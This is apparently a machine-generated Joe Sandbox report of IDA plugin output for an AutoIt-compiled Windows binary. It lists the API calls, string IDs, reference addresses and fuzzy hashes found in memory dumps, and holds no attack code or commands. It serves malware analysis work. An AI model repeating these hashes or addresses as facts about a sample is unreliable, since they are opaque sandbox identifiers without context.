                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 11eb5ae904cf0fe54e040fce98928eea51e1f697836511192884146f749e8aed
                                                                            • Instruction ID: 254fc81a0aeada9fede5513062d78e346640daa8935e5b5c543261224f7c2c9c
                                                                            • Opcode Fuzzy Hash: 11eb5ae904cf0fe54e040fce98928eea51e1f697836511192884146f749e8aed
                                                                            • Instruction Fuzzy Hash: 6DE04FB1100308EFDB026F70DC48A6E7BADFB4C350F11C845FD5A8B291DB7898408B40
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0033B2DF
                                                                            • UnloadUserProfile.USERENV(?,?), ref: 0033B2EB
                                                                            • CloseHandle.KERNEL32(?), ref: 0033B2F4
                                                                            • CloseHandle.KERNEL32(?), ref: 0033B2FC
                                                                              • Part of subcall function 0033AB24: GetProcessHeap.KERNEL32(00000000,?,0033A848), ref: 0033AB2B
                                                                              • Part of subcall function 0033AB24: HeapFree.KERNEL32(00000000), ref: 0033AB32
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                            • String ID:
                                                                            • API String ID: 146765662-0
                                                                            • Opcode ID: 31b126ecb70b54ca3aebb05019681466d6012c5e2b0faa78ab254ea2b6ad216a
                                                                            • Instruction ID: 875c17dc6fa2ee5b441f9779c3be62b05e212cf32ad765ca25931380e2af03eb
                                                                            • Opcode Fuzzy Hash: 31b126ecb70b54ca3aebb05019681466d6012c5e2b0faa78ab254ea2b6ad216a
                                                                            • Instruction Fuzzy Hash: 36E0EC3A104505BFDB033FA5EC08859FFBAFF98321B108661F625815B1CB72A871EB91
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 2889604237-0
                                                                            • Opcode ID: 3ab066df9c90e505fb19c034eaaf2ce1ca0fe52e4c193d766f2c549caece9b83
                                                                            • Instruction ID: 7185f64494e340c437ac969046917cbbcb7b40456aa8c1b5a04ce9df62879ad3
                                                                            • Opcode Fuzzy Hash: 3ab066df9c90e505fb19c034eaaf2ce1ca0fe52e4c193d766f2c549caece9b83
                                                                            • Instruction Fuzzy Hash: F5E046B1500308EFDB026F70DC48A6D7BADFB4C390F118849F95A8B2A0EB7898408B40
                                                                            APIs
                                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0033DEAA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ContainedObject
                                                                            • String ID: AutoIt3GUI$Container
                                                                            • API String ID: 3565006973-3941886329
                                                                            • Opcode ID: 6bcf9d81041f052c5ffe2b787e5cb36cad30b7df8d1bf043205728879b15b959
                                                                            • Instruction ID: fcb414f5807a12fc97d220afbc116fa2bd9f39b1b8df26832540b0b55ff4e873
                                                                            • Opcode Fuzzy Hash: 6bcf9d81041f052c5ffe2b787e5cb36cad30b7df8d1bf043205728879b15b959
                                                                            • Instruction Fuzzy Hash: 46915574600201AFDB16DF64D884A6ABBB9BF48714F20896DF90ACF691DB70E840CB60
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscpy
                                                                            • String ID: I/7$I/7
                                                                            • API String ID: 3048848545-1404973029
                                                                            • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                            • Instruction ID: 28e05e610f2c6a7c432e53578f68df8c26163b27f20aa691e75f097ff7a024f9
                                                                            • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                            • Instruction Fuzzy Hash: F141B231900216AACF26DF98D451AFEB7F0EF49710F95505AF881BF191DB30AE92C7A4
                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 0031BCDA
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0031BCF3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: GlobalMemorySleepStatus
                                                                            • String ID: @
                                                                            • API String ID: 2783356886-2766056989
                                                                            • Opcode ID: 0ac7009a94cb30c2696fe8f61f3cb48980d58e484af11380d924c343b4c9f684
                                                                            • Instruction ID: db4bf575ae300de8b12660ee9589c4d49c365a87e9edd22df12b8f026f8f86af
                                                                            • Opcode Fuzzy Hash: 0ac7009a94cb30c2696fe8f61f3cb48980d58e484af11380d924c343b4c9f684
                                                                            • Instruction Fuzzy Hash: B15125714087489BE321AF14DC86BAFBBECFF98354F414C4EF2C8450A6DB7085A98796
                                                                            APIs
                                                                              • Part of subcall function 003044ED: __fread_nolock.LIBCMT ref: 0030450B
                                                                            • _wcscmp.LIBCMT ref: 0034C65D
                                                                            • _wcscmp.LIBCMT ref: 0034C670
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscmp$__fread_nolock
                                                                            • String ID: FILE
                                                                            • API String ID: 4029003684-3121273764
                                                                            • Opcode ID: ee53289a3f006a7df1c71f561f282d77c53cfe023cd1d51591a4efe92e79f2ef
                                                                            • Instruction ID: 257602538ae54980a99b1f3a4be8b9b0d6372ccb93913e9dbe02e2e744a0498a
                                                                            • Opcode Fuzzy Hash: ee53289a3f006a7df1c71f561f282d77c53cfe023cd1d51591a4efe92e79f2ef
                                                                            • Instruction Fuzzy Hash: 0041F472A0021ABBDF229AA5DC41FEF77F9AF49704F014069F605EF181D774AA04CB60
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0036A85A
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0036A86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: '
                                                                            • API String ID: 3850602802-1997036262
                                                                            • Opcode ID: 27ec99e9dbf0f62187e23393e5f65dbec928e2f8283cd92269bdae876e8b1edf
                                                                            • Instruction ID: 9d331a17c066cf4913fe91f3ac3630e4aee39f86a21a8db06e4eb5f1bb409fec
                                                                            • Opcode Fuzzy Hash: 27ec99e9dbf0f62187e23393e5f65dbec928e2f8283cd92269bdae876e8b1edf
                                                                            • Instruction Fuzzy Hash: 57410774A017099FDB15CFA8C880BDABBB9FB09300F11416AE905EB385D770A951DFA1
                                                                            APIs
                                                                            • DestroyWindow.USER32(?,?,?,?), ref: 0036980E
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0036984A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$DestroyMove
                                                                            • String ID: static
                                                                            • API String ID: 2139405536-2160076837
                                                                            • Opcode ID: 67d0368da3eaf714a9ae76020acc8d88c70abb71b49adfc04c118add0987b12b
                                                                            • Instruction ID: 0b9bff5d94a78cdd1aaed8f2cda7f79171f109997e693214c1cdeed8b4ada693
                                                                            • Opcode Fuzzy Hash: 67d0368da3eaf714a9ae76020acc8d88c70abb71b49adfc04c118add0987b12b
                                                                            • Instruction Fuzzy Hash: 4C318B71110604AAEB129F34CC80BFB77ADFF99764F11861AF9A9C7190DA30AC81C760
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 003451C6
                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00345201
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: InfoItemMenu_memset
                                                                            • String ID: 0
                                                                            • API String ID: 2223754486-4108050209
                                                                            • Opcode ID: 233be020d7ecc6a6bde44da1dcf9322d0275500ba4a199559c38f3b42921f68c
                                                                            • Instruction ID: 46fd216692a811548fe622f16d90fafee232c3a628fcc703f5c2a314ddeaa8a8
                                                                            • Opcode Fuzzy Hash: 233be020d7ecc6a6bde44da1dcf9322d0275500ba4a199559c38f3b42921f68c
                                                                            • Instruction Fuzzy Hash: A731E931D007089FDB26CF99D845B9EBBF8FF45350F15481AE981EE1A2D7B0A944CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __snwprintf
                                                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                                                            • API String ID: 2391506597-2584243854
                                                                            • Opcode ID: 27f4d26f58f8e90de010b2fa68bd7ecc309b2d9fa0b068aca63dc65008cf9ed7
                                                                            • Instruction ID: 01b29d9bae225b8ed3aef3a2eddf164f91adcc05d4ffc5b7765da3b853971a87
                                                                            • Opcode Fuzzy Hash: 27f4d26f58f8e90de010b2fa68bd7ecc309b2d9fa0b068aca63dc65008cf9ed7
                                                                            • Instruction Fuzzy Hash: 17218071A01228AFCF16EFA4C892EEE77B4AF45704F400459F905AF191DB70EE49CBA5
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0036945C
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00369467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: Combobox
                                                                            • API String ID: 3850602802-2096851135
                                                                            • Opcode ID: 8181ee7d4be327735fcc27c0cf046b3366f649881cb14145d49aba7cb3f20398
                                                                            • Instruction ID: 2c94cd4dd866fefcf0fed472fa91e238996865f7a7a2bc67255ee8e3d3e6c1e9
                                                                            • Opcode Fuzzy Hash: 8181ee7d4be327735fcc27c0cf046b3366f649881cb14145d49aba7cb3f20398
                                                                            • Instruction Fuzzy Hash: 77119071200208AFEF13DF55DC80FBB376EEB483A4F118126F9189B294DA319C529760
                                                                            APIs
                                                                              • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
                                                                            • GetActiveWindow.USER32 ref: 0036DA7B
                                                                            • EnumChildWindows.USER32(?,0036D75F,00000000), ref: 0036DAF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ActiveChildEnumLongWindows
                                                                            • String ID: T15
                                                                            • API String ID: 3814560230-68852975
                                                                            • Opcode ID: 54d3844aa44fcd86fa1e64eed466a9d4b7ca411f6161a0ee6e525644ae205235
                                                                            • Instruction ID: 6f5d39ff93d81b4047b7b030b4dd9c26572763e5768ac1accbf92f2518cf2367
                                                                            • Opcode Fuzzy Hash: 54d3844aa44fcd86fa1e64eed466a9d4b7ca411f6161a0ee6e525644ae205235
                                                                            • Instruction Fuzzy Hash: 2E216B39604200DFC716DF28D850AA6B3E9EB4A320F25461DF86AC73E5D730B860DB64
APIs
  • Part of subcall function 0031D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0031D1BA
  • Part of subcall function 0031D17C: GetStockObject.GDI32(00000011), ref: 0031D1CE
  • Part of subcall function 0031D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0031D1D8
• GetWindowRect.USER32(00000000,?), ref: 00369968
• GetSysColor.USER32(00000012), ref: 00369982
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 00369699
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 003696A8
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
APIs
• _memset.LIBCMT ref: 003452D5
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 003452F4
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00354DF5
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00354E1E
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003337A7
• ___raise_securityfailure.LIBCMT ref: 0033388E
Similarity
• API ID: FeaturePresentProcessor___raise_securityfailure
• String ID: (<
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0035A84E
• htons.WSOCK32(00000000,?,00000000), ref: 0035A88B
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
APIs
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0033B7EF
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
APIs
• SendMessageW.USER32(?,00000180,00000000,?), ref: 0033B6EB
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
APIs
• SendMessageW.USER32(?,00000182,?,00000000), ref: 0033B76C
Similarity
• API ID: MessageSend
• String ID: ComboBox$ListBox
APIs
Similarity
• API ID: __calloc_crt
• String ID: "<
APIs
• LoadImageW.USER32(00300000,00000063,00000001,00000010,00000010,00000000), ref: 00304048
• EnumResourceNamesW.KERNEL32(00000000,0000000E,003467E9,00000063,00000000,76AB0280,?,?,00303EE1,?,?,000000FF), ref: 003741B3
Similarity
• API ID: EnumImageLoadNamesResource
• String ID: >0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: ClassName_wcscmp
• String ID: #32770
• API String ID: 2292705959-463685578
APIs
• MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0033A63F
  • Part of subcall function 003213F1: _doexit.LIBCMT ref: 003213FB
Strings
Similarity
• API ID: Message_doexit
• String ID: AutoIt$Error allocating memory.
• API String ID: 1993061046-4017498283
APIs
• GetSystemDirectoryW.KERNEL32(?), ref: 0037ACC0
• FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0037AEBD
Strings
Similarity
• API ID: DirectoryFreeLibrarySystem
• String ID: WIN_XPe
• API String ID: 510247158-3257408948
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003686A2
• PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003686B5
  • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003686E2
• PostMessageW.USER32(00000000), ref: 003686E9
  • Part of subcall function 00347A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00347AD0
Strings
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461